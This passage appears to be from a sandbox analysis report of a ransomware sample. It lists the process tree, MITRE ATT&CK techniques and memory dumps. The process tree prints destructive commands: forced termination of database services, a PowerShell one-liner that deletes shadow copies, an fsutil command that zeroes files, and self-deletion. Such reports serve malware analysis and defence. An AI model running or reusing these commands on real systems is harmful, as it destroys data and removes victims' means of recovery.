  - Suspicious use of AdjustPrivilegeToken
  PID:2536
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM oracle.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2564
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM sqlagent.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2588
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM sqlbrowser.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2612
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM sqlservr.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2636
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM synctime.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2672
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2696
- C:\Windows\System32\notepad.exe
  "C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txt
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:1372
- C:\Windows\system32\cmd.exe
  "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
  2⤵
  PID:1080
- - C:\Windows\system32\PING.EXE
    ping 127.0.0.7 -n 3
    3⤵
    - Runs ping.exe
    PID:2632
- - C:\Windows\system32\fsutil.exe
    fsutil file setZeroData offset=0 length=524288 “%s”
    3⤵
    PID:3900
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
  2⤵
  - Deletes itself
  PID:1856
- - C:\Windows\system32\choice.exe
    choice /C Y /N /D Y /T 3
    3⤵
    PID:2268

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Credentials in Files

T1081

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/316-1-0x00000000008F0000-0x00000000008F1000-memory.dmp

Filesize
4KB

Download
memory/316-0-0x000007FEF66E0000-0x000007FEF70CC000-memory.dmp

Filesize
9.9MB

Download
memory/2696-60-0x0000000002700000-0x0000000002701000-memory.dmp

Filesize
4KB

Download
memory/2696-59-0x00000000026D0000-0x00000000026D1000-memory.dmp

Filesize
4KB

Download
memory/2696-58-0x000000001AB50000-0x000000001AB51000-memory.dmp

Filesize
4KB

Download
memory/2696-57-0x0000000002380000-0x0000000002381000-memory.dmp

Filesize
4KB

Download
memory/2696-56-0x000007FEF66E0000-0x000007FEF70CC000-memory.dmp

Filesize
9.9MB

Download